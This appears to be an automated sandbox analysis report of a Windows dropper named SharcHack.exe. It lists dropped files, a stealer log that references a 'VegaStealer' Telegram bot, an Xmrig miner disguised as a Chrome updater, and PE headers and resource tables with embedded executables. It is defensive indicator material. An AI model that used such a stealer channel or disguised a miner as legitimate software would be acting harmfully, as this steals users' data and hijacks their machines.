                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1528
                                                                                                                                                                                                                                    Entropy (8bit):4.511496963805806
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:gMMNoEMshMp11IATMphEQQ6pgzayohCowpwl0/Ndt0v03ZVv7V57Nx4:gMMOEMshMp11IATMphEQlpkayohCo6Je
                                                                                                                                                                                                                                    MD5:324CD37D67EDD3095EC70C60E9026A0E
                                                                                                                                                                                                                                    SHA1:D78B22D81825B8D3A955C09C1FB131221DF8C632
                                                                                                                                                                                                                                    SHA-256:9C240B3147850E385AE75B47B1385D20DC66D8A848476EE5858A74F3F2B4E750
                                                                                                                                                                                                                                    SHA-512:8BCFE0D0430076B629229C93FAEF9B0CEF6A17A6A44522FC596137C445214F7CEC789AFECAD51952044079DDB72EA06908923394FB4E486BF099C36368367B94
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:. ********************************************. * .................................. *. * .................................. *. * .................................. *. * .................................. *. * .................................. *. * .................................. *. * https://t.me/VegaStealer_bot *. * *. * ******************************************* ==================================================. Operating system: Windows 10 Pro (64 Bit). PC user: 932923/user. C
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):4221
                                                                                                                                                                                                                                    Entropy (8bit):4.967603429012699
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:96:lr2RDRRRUlDRRzfUUjt/ReRRlwRURRRDZRRUUmYllmURa71RS+RRhRRRRKUmRRUI:lr2RDRRRUlDRRLUUjt/ReRRqRURRRDZz
                                                                                                                                                                                                                                    MD5:D77CB2F0B64F2612AF0675009F993620
                                                                                                                                                                                                                                    SHA1:C3B8EF2C6164384549BE9B8ECEB6400A76C6D249
                                                                                                                                                                                                                                    SHA-256:88DCD81B71A40F4E79B1230DB236231F6319F17863C0AC15EB610E2535CD1149
                                                                                                                                                                                                                                    SHA-512:91F3D779259020F2A29E1782341E3B306C1538A88067C858192CF1AA7C4F8B3BE551236C9A2CE3A783B4880AF1F1F5CE077FFCFAD40017C5ED6CDB92801FA190
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:NAME: svchost..NAME: HxUZFnWBmBTYeWekkOumtZvTPw..NAME: CheatEngine75..NAME: HxUZFnWBmBTYeWekkOumtZvTPw..NAME: csrss..NAME: HxUZFnWBmBTYeWekkOumtZvTPw..NAME: HxUZFnWBmBTYeWekkOumtZvTPw..NAME: svchost..NAME: svchost..NAME: HxUZFnWBmBTYeWekkOumtZvTPw..NAME: HxUZFnWBmBTYeWekkOumtZvTPw..NAME: HxUZFnWBmBTYeWekkOumtZvTPw..NAME: HxUZFnWBmBTYeWekkOumtZvTPw..NAME: RuntimeBroker..NAME: svchost..NAME: HxUZFnWBmBTYeWekkOumtZvTPw..NAME: svchost..NAME: svchost..NAME: HxUZFnWBmBTYeWekkOumtZvTPw..NAME: HxUZFnWBmBTYeWekkOumtZvTPw..NAME: HxUZFnWBmBTYeWekkOumtZvTPw..NAME: svchost..NAME: spoolsv..NAME: sihost..NAME: svchost..NAME: HxUZFnWBmBTYeWekkOumtZvTPw..NAME: svchost..NAME: HxUZFnWBmBTYeWekkOumtZvTPw..NAME: svchost..NAME: HxUZFnWBmBTYeWekkOumtZvTPw..NAME: backgroundTaskHost..NAME: fontdrvhost..NAME: HxUZFnWBmBTYeWekkOumtZvTPw..NAME: HxUZFnWBmBTYeWekkOumtZvTPw..NAME: fontdrvhost..NAME: svchost..NAME: StartMenuExperienceHost..NAME: HxUZFnWBmBTYeWekkOumtZvTPw..NAME: HxUZFnWBmBTYeWekkOumtZvTPw..NAME: HxUZ
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):721646
                                                                                                                                                                                                                                    Entropy (8bit):7.930156273019023
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:LN5Ik7hE5TUlevY31R2XSefNYv+h+PD07LOX+TYwCi0kQR5LSOcOvk+HxoldU:Yk78Uj1RySeCv+kZ+UMEHkkim
                                                                                                                                                                                                                                    MD5:5325588A3053EADCAA1F813C8DFFB15D
                                                                                                                                                                                                                                    SHA1:E15A26684F6EE5119CCC55B44A080BACDFA8450F
                                                                                                                                                                                                                                    SHA-256:D378265F52592779079B149DDC0C135CFD3A68D49163405D16A8D182AFEF8EFA
                                                                                                                                                                                                                                    SHA-512:EF025FED3779F180294B2726DB8F2699CD4363D50BD7E9EED7C2EC79DAB5A8EA5249AB78039CA45DD76760762BDCAE4CF99A439685E80652B3737E6757C65987
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w.mG........ms......c...~.VuU..UUt.V.{o......$.......$.,.@.S.E...9...d......./..............1#..;...7f......<9.'...N....^'?5..I......3.......Nx|..7"S..|_.....:~..q....-.Wl!..........y1.......0|...Jo.C.b....H.G.}G0u......X..h.......w...b......S........].|...J...L.TE..w.....X...{.A.=w.d.."....w.=...w..1...'.....A.Z~0+..>7.o..H.TL......g..L.%.......M.Y..|_..z.wG...1S..Na....^{.......:Gc..1.....k,|..z.-...%..2..w.knJ.W......t..3X..S........../.X...c....{e....\?...L..%.7,}E.g..2...X....u........|..i..y...MK^~M..X......].-....9g.?.}.u..6M.uM..yu..qU.._..|o9.. .v...9gEn...y......nW.9.K.>..,....hk...=.N.....0^.{....B..+...}.O+........#..=.......].k..../L.zY......|.|...v...-.......u3.....+.g].?..]//..-.%.S.s.o...s...;....S;\RX..yLN.s.Kv..P....!.}..v...m/)..;.....osq7.s.a..y_..b-......vy}n5^.m....d.|..'.<A.y`n..;.1..{.....E%...%.\].
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):64
                                                                                                                                                                                                                                    Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:@...e...........................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\updater.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1993216
                                                                                                                                                                                                                                    Entropy (8bit):7.937291620882887
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:49152:a0345NXqa1p8X7stbjkI8skQ0beZ5kxdxhngmN5lp32qIH+Du+9nL:a0o5NTrttEIj0aZ2xdxxgmzX3eUu+9
                                                                                                                                                                                                                                    MD5:16B93C72B9B6AE18C2A7B1C3330BF8BB
                                                                                                                                                                                                                                    SHA1:9B8478973757D18B6FC4D2873A82F4F8F7E6FED8
                                                                                                                                                                                                                                    SHA-256:84C56026C8C3177D0269B52883D4EEA3E6BEE3BDA03479E8FA39C739E6914B7D
                                                                                                                                                                                                                                    SHA-512:8C1669324D8B70A2911CC1833FCAD31A1394A068A328C0C03864DBF78034BD172E3DAC6685C9F37DA856993847349D6E0C6394C72C666C5ACB3025E254B70FA9
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\Temp\cfoutowi.tmp, Author: Joe Security
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 62%
                                                                                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......HJ...+..+..+..@..+..@..+..@..+..@..+.^^..+.^^..+.^^.n+.jD(..+..^..+..@..+..+..*..[._)..^..*..^..+..^*..+..+B..+..^..+.Rich.+.........PE..d...`.Vc.........."......`........`. '....`....@.............................@............`..................................................4..H....0........{.,............7..$............................)..(...X*..8...........................................UPX0......`.............................UPX1.....`....`..\..................@....rsrc........0.......`..............@......................................................................................................................................................................................................................................................................................................................4.00.UPX!.$..
                                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Entropy (8bit):7.9907570228332245
                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                    File name:SharcHack.exe
                                                                                                                                                                                                                                    File size:41'879'040 bytes
                                                                                                                                                                                                                                    MD5:796310542e9fb2886de3f8cbdf88c9fa
                                                                                                                                                                                                                                    SHA1:01dc8e64ff23db2f177e3d999c12329bfcd206d3
                                                                                                                                                                                                                                    SHA256:9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193
                                                                                                                                                                                                                                    SHA512:73295b9cfa07432b21d1f0d0bad360460f32d7e0170dc84406a35f4dfe2b1519fdc4028299f1075385ae4ab738be1e5bfffd7335c1038e2126669834e9a50966
                                                                                                                                                                                                                                    SSDEEP:786432:Y31/CaCJz7+GWl3LNCxuEnwFho+zM77UDZiZCd08jFZJAI5E70TZFHng:URCR6GWl3LMEXFhV0KAcNjxAItjg
                                                                                                                                                                                                                                    TLSH:7397332BE26C516ECC995B3D5A7293208D776A716F0A8D1903FC36CCCF62E700E6A517
                                                                                                                                                                                                                                    File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                                                                                                                                    Icon Hash:696ce8f0d2d44c6d
                                                                                                                                                                                                                                    Entrypoint:0x4020cc
                                                                                                                                                                                                                                    Entrypoint Section:CODE
                                                                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                                                                                                                    DLL Characteristics:
                                                                                                                                                                                                                                    Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                                    OS Version Major:4
                                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                                    File Version Major:4
                                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                                    Import Hash:d59a4a699610169663a929d37c90be43
                                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                                                                                    mov ecx, 0000000Ch
                                                                                                                                                                                                                                    push 00000000h
                                                                                                                                                                                                                                    push 00000000h
                                                                                                                                                                                                                                    dec ecx
                                                                                                                                                                                                                                    jne 00007EFFE11B965Bh
                                                                                                                                                                                                                                    push ecx
                                                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                                                    push esi
                                                                                                                                                                                                                                    push edi
                                                                                                                                                                                                                                    mov eax, 0040209Ch
                                                                                                                                                                                                                                    call 00007EFFE11B90D0h
                                                                                                                                                                                                                                    xor eax, eax
                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                    push 00402361h
                                                                                                                                                                                                                                    push dword ptr fs:[eax]
                                                                                                                                                                                                                                    mov dword ptr fs:[eax], esp
                                                                                                                                                                                                                                    lea edx, dword ptr [ebp-14h]
                                                                                                                                                                                                                                    mov eax, 00402378h
                                                                                                                                                                                                                                    call 00007EFFE11B94A9h
                                                                                                                                                                                                                                    mov eax, dword ptr [ebp-14h]
                                                                                                                                                                                                                                    call 00007EFFE11B9579h
                                                                                                                                                                                                                                    mov edi, eax
                                                                                                                                                                                                                                    test edi, edi
                                                                                                                                                                                                                                    jng 00007EFFE11B9896h
                                                                                                                                                                                                                                    mov ebx, 00000001h
                                                                                                                                                                                                                                    lea edx, dword ptr [ebp-20h]
                                                                                                                                                                                                                                    mov eax, ebx
                                                                                                                                                                                                                                    call 00007EFFE11B9538h
                                                                                                                                                                                                                                    mov ecx, dword ptr [ebp-20h]
                                                                                                                                                                                                                                    lea eax, dword ptr [ebp-1Ch]
                                                                                                                                                                                                                                    mov edx, 00402384h
                                                                                                                                                                                                                                    call 00007EFFE11B8CC8h
                                                                                                                                                                                                                                    mov eax, dword ptr [ebp-1Ch]
                                                                                                                                                                                                                                    lea edx, dword ptr [ebp-18h]
                                                                                                                                                                                                                                    call 00007EFFE11B946Dh
                                                                                                                                                                                                                                    mov edx, dword ptr [ebp-18h]
                                                                                                                                                                                                                                    mov eax, 00404680h
                                                                                                                                                                                                                                    call 00007EFFE11B8BA0h
                                                                                                                                                                                                                                    lea edx, dword ptr [ebp-2Ch]
                                                                                                                                                                                                                                    mov eax, ebx
                                                                                                                                                                                                                                    call 00007EFFE11B9506h
                                                                                                                                                                                                                                    mov ecx, dword ptr [ebp-2Ch]
                                                                                                                                                                                                                                    lea eax, dword ptr [ebp-28h]
                                                                                                                                                                                                                                    mov edx, 00402390h
                                                                                                                                                                                                                                    call 00007EFFE11B8C96h
                                                                                                                                                                                                                                    mov eax, dword ptr [ebp-28h]
                                                                                                                                                                                                                                    lea edx, dword ptr [ebp-24h]
                                                                                                                                                                                                                                    call 00007EFFE11B943Bh
                                                                                                                                                                                                                                    mov edx, dword ptr [ebp-24h]
                                                                                                                                                                                                                                    mov eax, 00404684h
                                                                                                                                                                                                                                    call 00007EFFE11B8B6Eh
                                                                                                                                                                                                                                    lea edx, dword ptr [ebp-38h]
                                                                                                                                                                                                                                    mov eax, ebx
                                                                                                                                                                                                                                    call 00007EFFE11B94D4h
                                                                                                                                                                                                                                    mov ecx, dword ptr [ebp-38h]
                                                                                                                                                                                                                                    lea eax, dword ptr [ebp-34h]
                                                                                                                                                                                                                                    mov edx, 0040239Ch
                                                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x50000x302.idata
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x90000x27ee2b0.rsrc
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x80000x1c8.reloc
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x70000x18.rdata
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                    CODE0x10000x13b80x1400e5913936857bed3b3b2fbac53e973471False0.6318359375data6.340990548290613IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    DATA0x30000x7c0x200cef89de607e490725490a3cd679af6bbFalse0.162109375Matlab v4 mat-file (little endian) , numeric, rows 0, columns 42304001.1176271682252383IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                    BSS0x40000x6950x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                    .idata0x50000x3020x4003d2f2fc4e279cba623217ec9de264c4fFalse0.3876953125data3.47731642923935IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                    .tls0x60000x40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                    .rdata0x70000x180x200467f29e48f3451df774e13adae5aafc2False0.05078125data0.1991075177871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    .reloc0x80000x1c80x2009859d413c7408cb699cca05d648c2502False0.876953125data5.7832974211095225IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    .rsrc0x90000x27ee2b00x27ee400b70e04cb4b09237c962a9bb891c9b65aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                    RT_ICON0x93c00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 655360.07745770732284396
                                                                                                                                                                                                                                    RT_RCDATA0x19be80x38b200PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows0.9559793472290039
                                                                                                                                                                                                                                    RT_RCDATA0x3a4de80x7b1c00PE32 executable (GUI) Intel 80386, for MS Windows0.9835062026977539
                                                                                                                                                                                                                                    RT_RCDATA0xb569e80x1ca05a0PE32 executable (GUI) Intel 80386, for MS Windows0.47138500213623047
                                                                                                                                                                                                                                    RT_RCDATA0x27f6f880x5ASCII text, with no line terminators2.6
                                                                                                                                                                                                                                    RT_RCDATA0x27f6f900x12ASCII text, with no line terminators1.4444444444444444
                                                                                                                                                                                                                                    RT_RCDATA0x27f6fa40x11ASCII text, with no line terminators1.4705882352941178
                                                                                                                                                                                                                                    RT_RCDATA0x27f6fb80x1very short file (no magic)9.0
                                                                                                                                                                                                                                    RT_RCDATA0x27f6fbc0x1very short file (no magic)9.0
                                                                                                                                                                                                                                    RT_RCDATA0x27f6fc00x1very short file (no magic)9.0
                                                                                                                                                                                                                                    RT_RCDATA0x27f6fc40x1very short file (no magic)9.0
                                                                                                                                                                                                                                    RT_RCDATA0x27f6fc80x1very short file (no magic)9.0
                                                                                                                                                                                                                                    RT_RCDATA0x27f6fcc0x1very short file (no magic)9.0
                                                                                                                                                                                                                                    RT_RCDATA0x27f6fd00x1very short file (no magic)9.0
